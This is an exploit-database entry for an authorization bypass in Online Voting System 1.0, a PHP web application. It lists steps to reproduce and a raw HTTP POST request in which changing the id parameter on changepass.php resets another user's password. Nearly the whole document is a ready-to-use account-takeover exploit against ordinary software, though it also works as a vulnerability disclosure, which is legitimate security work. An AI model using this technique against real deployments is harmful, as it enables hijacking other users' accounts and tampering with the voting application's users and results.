Exploit for Online Voting System 1.0 Authorization Bypass

## https://sploitus.com/exploit?id=PACKETSTORM:161197
# Exploit Title:Online Voting System | Authentication Bypass (Password Change   
# Exploit Author: Richard Jones  
# Date: 2021-01-29  
# Vendor Homepage: https://www.sourcecodester.com/php/14690/online-voting-system-phpmysqli-full-source-code.html  
# Software Link:https://www.sourcecodester.com/download-code?nid=14690&title=Online+Voting+System+in+PHP%2FMySQLi+with+Full+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
  
## Steps to reproduce  
# 1. Register an account (any user): http://TARGET/online_voting/registeracc.php  
# 2. Login  
# 3. Goto change password: http://TARGET/online_voting/changepass.php  
# 4. Change the password and intercept the request with Burp Suite  
# 5. Change the id paramater (id=7 to, id=1) of the url to another users account, Password will be updated  
  
POST /online_voting/changepass.php?id=7 HTTP/1.1  
Host: TARGET  
Content-Length: 55  
Connection: close  
Referer: http://localhost/online_voting/changepass.php?id=7  
Cookie: PHPSESSID=t19ph5v0sem2pi0gaap55j08ei  
  
oldpass=a&newpass=a&conpass=a&changepass=Update+Profile